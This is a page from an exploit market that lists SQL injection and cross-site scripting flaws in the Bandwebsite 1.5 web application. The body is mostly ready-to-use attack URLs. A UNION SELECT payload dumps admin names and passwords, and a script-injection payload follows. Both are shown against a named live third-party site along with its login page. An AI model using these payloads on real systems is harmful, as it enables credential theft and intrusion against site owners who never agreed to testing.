[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4244
Category
web applications
Date add
24-11-2008
Platform
unsorted
=========================================================
Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
=========================================================



[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln.
[~]
[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] Date: 24.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) )
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

exploit:

http://localhost/script/lyrics.php?section=full&id=[SQL]

http://localhost/script/info.php?section=[XSS]

[SQL]

99999999+union+select+1,name,3,pass,5+from+admin--


example:

http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--

login:

http://www.caro-kunde.de/login.php


XSS:

http://www.caro-kunde.de/info.php?section="><script>alert()</script>


[~]----------------------------------------------------------------------




#  0day.today [2024-11-16]  #